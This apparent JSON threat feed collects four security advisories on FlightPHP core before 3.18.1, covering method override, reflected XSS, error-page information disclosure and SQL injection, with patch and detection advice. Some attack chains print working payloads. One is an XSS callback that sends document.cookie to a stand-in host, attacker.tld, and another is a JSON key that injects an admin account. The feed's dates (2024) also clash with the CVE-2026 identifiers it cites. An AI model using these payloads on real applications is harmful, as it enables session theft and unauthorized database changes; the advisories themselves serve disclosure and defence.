{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/products/flightphp/core--3.18.1/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["flightphp/core (\u003c 3.18.1)"],"_cs_severities":["high"],"_cs_tags":["csrf","middleware-bypass","cache-poisoning","http-method-override"],"_cs_type":"advisory","_cs_vendors":["composer"],"content_html":"\u003cp\u003eFlightPHP versions prior to 3.18.1 are vulnerable to HTTP method override. The vulnerability resides in the \u003ccode\u003eRequest::getMethod()\u003c/code\u003e function within \u003ccode\u003eflight/net/Request.php\u003c/code\u003e. The application unconditionally honors the \u003ccode\u003eX-HTTP-Method-Override\u003c/code\u003e header and the \u003ccode\u003e$_REQUEST['_method']\u003c/code\u003e parameter, even on safe HTTP verbs like GET. This behavior allows an attacker to modify the intended HTTP method, potentially leading to Cross-Site Request Forgery (CSRF) escalation, bypassing of authentication and rate-limiting middleware, and CDN cache poisoning. This vulnerability was discovered by @Rootingg and patched in version 3.18.1 (commit b8dd23a) by introducing the \u003ccode\u003eflight.allow_method_override\u003c/code\u003e setting. Disabling this setting mitigates the vulnerability by ignoring method overrides.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a FlightPHP application using a version prior to 3.18.1.\u003c/li\u003e\n\u003cli\u003eThe attacker locates an endpoint that performs a sensitive action using an unsafe HTTP method (e.g., DELETE, PUT).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious URL targeting the vulnerable endpoint, using a GET request with either the \u003ccode\u003e_method\u003c/code\u003e parameter (e.g., \u003ccode\u003e/?_method=DELETE\u003c/code\u003e) or the \u003ccode\u003eX-HTTP-Method-Override\u003c/code\u003e header.\u003c/li\u003e\n\u003cli\u003eFor CSRF, the attacker embeds the malicious URL within an HTML \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag on a website they control.\u003c/li\u003e\n\u003cli\u003eA victim visits the attacker\u0026rsquo;s website, and their browser automatically sends a GET request to the vulnerable application.\u003c/li\u003e\n\u003cli\u003eThe FlightPHP application incorrectly interprets the GET request as the specified unsafe method (e.g., DELETE) due to the \u003ccode\u003e_method\u003c/code\u003e parameter or \u003ccode\u003eX-HTTP-Method-Override\u003c/code\u003e header.\u003c/li\u003e\n\u003cli\u003eThe application executes the sensitive action (e.g., deleting a resource) on behalf of the victim without proper authorization.\u003c/li\u003e\n\u003cli\u003eAlternatively, if middleware checks HTTP method to apply controls, this can be bypassed by issuing a GET request with a forged \u003ccode\u003e_method\u003c/code\u003e parameter or \u003ccode\u003eX-HTTP-Method-Override\u003c/code\u003e header.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can have several significant impacts. It allows attackers to perform CSRF attacks, potentially leading to unauthorized data modification or deletion. Attackers can bypass security middleware that relies on HTTP method verification, gaining unauthorized access to protected resources. The vulnerability also enables CDN cache poisoning, where the CDN caches the response of a GET request that was actually processed as a DELETE or PUT, serving incorrect content to future users. The exact number of affected FlightPHP applications is unknown, but any application using a vulnerable version is potentially at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade FlightPHP to version 3.18.1 or later to patch CVE-2026-42551.\u003c/li\u003e\n\u003cli\u003eSet the \u003ccode\u003eflight.allow_method_override\u003c/code\u003e setting to \u003ccode\u003efalse\u003c/code\u003e to disable HTTP method overriding as described in the advisory.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect FlightPHP HTTP Method Override via _method Parameter\u003c/code\u003e to detect exploitation attempts using the \u003ccode\u003e_method\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect FlightPHP HTTP Method Override via X-HTTP-Method-Override Header\u003c/code\u003e to detect exploitation attempts using the \u003ccode\u003eX-HTTP-Method-Override\u003c/code\u003e header.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-26T12:00:00Z","date_published":"2024-01-26T12:00:00Z","id":"/briefs/2024-01-26-flightphp-http-override/","summary":"A vulnerability in FlightPHP core versions before 3.18.1 allows attackers to override HTTP methods via the `X-HTTP-Method-Override` header or `_method` parameter, leading to CSRF escalation, middleware bypass, and cache poisoning.","title":"FlightPHP HTTP Method Override Vulnerability Leads to CSRF and Middleware Bypass","url":"https://feed.craftedsignal.io/briefs/2024-01-26-flightphp-http-override/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["flightphp/core (\u003c 3.18.1)"],"_cs_severities":["high"],"_cs_tags":["reflected-xss","web-application","php"],"_cs_type":"advisory","_cs_vendors":["Composer"],"content_html":"\u003cp\u003eFlightPHP versions prior to 3.18.1 are vulnerable to reflected cross-site scripting (XSS) due to insufficient validation of the \u003ccode\u003ejsonp\u003c/code\u003e query parameter within the \u003ccode\u003eFlight::jsonp()\u003c/code\u003e function. This function, intended for JSONP responses, directly concatenates the \u003ccode\u003ejsonp\u003c/code\u003e parameter into the \u003ccode\u003eapplication/javascript\u003c/code\u003e response body without ensuring it\u0026rsquo;s a valid JavaScript identifier. This flaw allows an attacker to inject arbitrary JavaScript code, which then executes in the context of the victim\u0026rsquo;s origin when the vulnerable endpoint is accessed via a \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e tag from an attacker-controlled page. The vulnerability was discovered by @Rootingg and patched in version 3.18.1, commit \u003ccode\u003eb8dd23a\u003c/code\u003e, by implementing a regex validation (\u003ccode\u003e^[A-Za-z_$][\\w$.]{0,127}$\u003c/code\u003e) on the callback name.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies an application using FlightPHP versions prior to 3.18.1.\u003c/li\u003e\n\u003cli\u003eThe attacker locates a route that calls the vulnerable \u003ccode\u003eFlight::jsonp()\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious URL containing a \u003ccode\u003ejsonp\u003c/code\u003e parameter with an XSS payload. Example: \u003ccode\u003e/api?jsonp=;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker hosts a page containing a \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e tag that points to the vulnerable endpoint on the victim\u0026rsquo;s domain, using the crafted malicious URL.\u003c/li\u003e\n\u003cli\u003eA user visits the attacker-controlled page in a browser.\u003c/li\u003e\n\u003cli\u003eThe browser executes the injected JavaScript code from the \u003ccode\u003ejsonp\u003c/code\u003e parameter within the victim\u0026rsquo;s origin.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript steals sensitive information such as cookies, session tokens, or authenticated API responses.\u003c/li\u003e\n\u003cli\u003eThe stolen data is exfiltrated to a domain controlled by the attacker (e.g., \u003ccode\u003eattacker.tld\u003c/code\u003e).\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability can lead to significant consequences. Attackers can steal user cookies, hijack user sessions, and exfiltrate authenticated API responses. This impacts any application using the vulnerable \u003ccode\u003eFlight::jsonp()\u003c/code\u003e function. The number of potential victims depends on the popularity and usage of applications built with the affected FlightPHP versions. Successful attacks allow attackers to impersonate users, access sensitive data, and potentially compromise the entire application.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade FlightPHP to version 3.18.1 or later to incorporate the patch that validates the callback name.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect FlightPHP JSONP XSS Attempt\u003c/code\u003e to your SIEM to detect potential exploitation attempts by monitoring for specific patterns in web server logs.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests containing suspicious characters or JavaScript code within the \u003ccode\u003ejsonp\u003c/code\u003e query parameter, referencing the example URL in the Attack Chain.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation on all query parameters, especially those used in dynamic content generation, to prevent similar XSS vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-24T12:00:00Z","date_published":"2024-01-24T12:00:00Z","id":"/briefs/2024-01-24-flightphp-xss/","summary":"A reflected XSS vulnerability exists in FlightPHP versions prior to 3.18.1 due to improper validation of the jsonp query parameter in the Flight::jsonp() function, allowing attackers to inject arbitrary JavaScript leading to cookie theft, session hijacking, and data exfiltration.","title":"FlightPHP Reflected XSS Vulnerability in jsonp()","url":"https://feed.craftedsignal.io/briefs/2024-01-24-flightphp-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["flightphp/core (\u003c 3.18.1)"],"_cs_severities":["high"],"_cs_tags":["information-disclosure","web-application","flightphp"],"_cs_type":"advisory","_cs_vendors":["composer"],"content_html":"\u003cp\u003eThe FlightPHP framework, prior to version 3.18.1, is vulnerable to sensitive information disclosure due to its default error handling mechanism. The \u003ccode\u003eEngine::_error()\u003c/code\u003e function writes the full exception message, exception code, and stack trace directly into the HTTP 500 response without any debug gating. This behavior can expose internal filesystem paths, secrets interpolated into exception messages (such as database credentials or API tokens), and the application\u0026rsquo;s module structure. The vulnerability was discovered by @Rootingg and a proof of concept is available, demonstrating the leakage of sensitive information. This disclosure can provide attackers with valuable primitives for chaining other weaknesses, such as Local File Inclusion (LFI) or path traversal vulnerabilities. The issue is resolved in version 3.18.1 with the introduction of a \u003ccode\u003eflight.debug\u003c/code\u003e setting to control the verbosity of error output.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a FlightPHP application running a version prior to 3.18.1.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a request designed to trigger an uncaught exception within the application. This could be through invalid input, resource exhaustion, or other error-inducing actions.\u003c/li\u003e\n\u003cli\u003eThe application\u0026rsquo;s error handler, \u003ccode\u003eEngine::_error()\u003c/code\u003e, is invoked.\u003c/li\u003e\n\u003cli\u003eThe error handler formats the exception message, code, and stack trace into an HTML response.\u003c/li\u003e\n\u003cli\u003eThis response includes absolute filesystem paths, potentially revealing the application\u0026rsquo;s directory structure.\u003c/li\u003e\n\u003cli\u003eThe response may also include secrets, such as database credentials or API keys, if these are inadvertently included in exception messages.\u003c/li\u003e\n\u003cli\u003eThe HTTP 500 response is sent to the attacker\u0026rsquo;s browser, containing the sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the disclosed information to further exploit the application, potentially leveraging LFI or path traversal vulnerabilities to gain unauthorized access or execute arbitrary code.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to the disclosure of sensitive information, including absolute filesystem paths, database credentials, API tokens, and internal application structure. This information can be used to facilitate further attacks, such as Local File Inclusion (LFI) or path traversal vulnerabilities. The disclosure of database credentials or API tokens could grant attackers unauthorized access to sensitive data or systems. The vulnerability affects applications using FlightPHP versions prior to 3.18.1.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade FlightPHP to version 3.18.1 or later to patch the vulnerability. The fix introduces a \u003ccode\u003eflight.debug\u003c/code\u003e setting that gates the verbose output, preventing sensitive information from being exposed in production environments.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;FlightPHP Sensitive Information Disclosure in HTTP Response\u0026rdquo; to detect instances of verbose error messages in HTTP 500 responses.\u003c/li\u003e\n\u003cli\u003eReview application code to ensure that sensitive information, such as database credentials and API tokens, are not inadvertently included in exception messages.\u003c/li\u003e\n\u003cli\u003eEnable webserver logging (category: webserver, product: linux/windows) to capture HTTP requests and responses, facilitating detection and analysis of potential exploitation attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-08T12:00:00Z","date_published":"2024-01-08T12:00:00Z","id":"/briefs/2024-01-flightphp-info-disclosure/","summary":"The default error handler in FlightPHP core writes the full exception message, exception code, and stack trace directly into the HTTP 500 response, disclosing sensitive information such as internal paths, secrets, and application structure.","title":"FlightPHP Sensitive Information Disclosure via Default Error Handler","url":"https://feed.craftedsignal.io/briefs/2024-01-flightphp-info-disclosure/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["flightphp/core (\u003c 3.18.1)"],"_cs_severities":["high"],"_cs_tags":["sql-injection","web-application","vulnerability"],"_cs_type":"advisory","_cs_vendors":["composer"],"content_html":"\u003cp\u003eThe Flight framework, specifically versions prior to 3.18.1, contains an SQL injection vulnerability in the \u003ccode\u003eSimplePdo\u003c/code\u003e class. The \u003ccode\u003einsert()\u003c/code\u003e, \u003ccode\u003eupdate()\u003c/code\u003e, and \u003ccode\u003edelete()\u003c/code\u003e methods construct SQL queries by directly concatenating the \u003ccode\u003e$table\u003c/code\u003e argument and the keys of the \u003ccode\u003e$data\u003c/code\u003e array into the query string without proper sanitization or validation. This allows an attacker to inject arbitrary SQL commands by crafting malicious array keys when user-controlled data is forwarded to these helper methods (e.g., \u003ccode\u003e$db-\u0026gt;insert('users', $request-\u0026gt;data-\u0026gt;getData())\u003c/code\u003e). Discovered by @Rootingg, this vulnerability was addressed in commit b8dd23a and assigned CVE-2026-42550. Exploitation of this flaw can lead to privilege escalation, arbitrary data modification, and complete data exfiltration.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies an application endpoint that uses the Flight framework and its database interaction methods (insert, update, delete).\u003c/li\u003e\n\u003cli\u003eThe application uses \u003ccode\u003eSimplePdo::insert()\u003c/code\u003e, \u003ccode\u003eSimplePdo::update()\u003c/code\u003e, or \u003ccode\u003eSimplePdo::delete()\u003c/code\u003e with user-supplied data. For example: \u003ccode\u003e$db-\u0026gt;insert('users', $request-\u0026gt;data-\u0026gt;getData());\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious JSON payload with SQL injection in the array keys, such as \u003ccode\u003e{\u0026quot;name, is_admin) VALUES (?, 1);-- \u0026quot;: \u0026quot;attacker_injected\u0026quot;}\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker sends the crafted JSON payload to the vulnerable endpoint via an HTTP POST request.\u003c/li\u003e\n\u003cli\u003eThe application processes the JSON data and passes it to the vulnerable \u003ccode\u003eSimplePdo\u003c/code\u003e method.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eSimplePdo\u003c/code\u003e method concatenates the malicious array keys directly into the SQL query without validation or escaping. This results in the creation of an injected SQL query such as \u003ccode\u003eINSERT INTO users (name, is_admin) VALUES (?, 1);-- ) VALUES (?)\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe database executes the injected SQL query, leading to unintended modifications, such as the creation of an administrative account or modification of existing data.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges, exfiltrates data, or causes data destruction depending on the nature of the injected SQL.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this SQL injection vulnerability can lead to severe consequences, including unauthorized privilege escalation, allowing attackers to gain administrative control over the application. Attackers can also arbitrarily modify database columns, leading to data corruption or manipulation. Furthermore, data destruction and exfiltration are possible through the use of the \u003ccode\u003e$where\u003c/code\u003e parameter, potentially resulting in complete data loss or exposure of sensitive information. This vulnerability affects applications using Flight framework versions prior to 3.18.1.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to Flight framework version 3.18.1 or later, which includes the fix for CVE-2026-42550 with the \u003ccode\u003erequireSafeIdentifier()\u003c/code\u003e helper function.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization on all user-supplied data before passing it to database interaction methods, even after upgrading the Flight framework.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Flight Framework SQL Injection Attempt via Malicious Array Keys\u0026rdquo; to identify potential exploitation attempts by monitoring for suspicious patterns in HTTP request bodies and application logs.\u003c/li\u003e\n\u003cli\u003eReview and audit all existing code that uses \u003ccode\u003eSimplePdo::insert()\u003c/code\u003e, \u003ccode\u003eSimplePdo::update()\u003c/code\u003e, and \u003ccode\u003eSimplePdo::delete()\u003c/code\u003e to ensure proper data sanitization and prevent SQL injection vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-flight-sqli/","summary":"Flight framework is vulnerable to SQL Injection; an attacker can inject arbitrary SQL by crafting malicious array keys due to SimplePdo::insert(), SimplePdo::update(), and SimplePdo::delete() building SQL statements by concatenating the $table argument and the keys of the $data array directly into the query, with no identifier quoting or validation, leading to privilege escalation, arbitrary column writes, data destruction, and exfiltration.","title":"Flight Framework SQL Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-03-flight-sqli/"}],"language":"en","title":"CraftedSignal Threat Feed — Flightphp/Core (\u003c 3.18.1)","version":"https://jsonfeed.org/version/1.1"}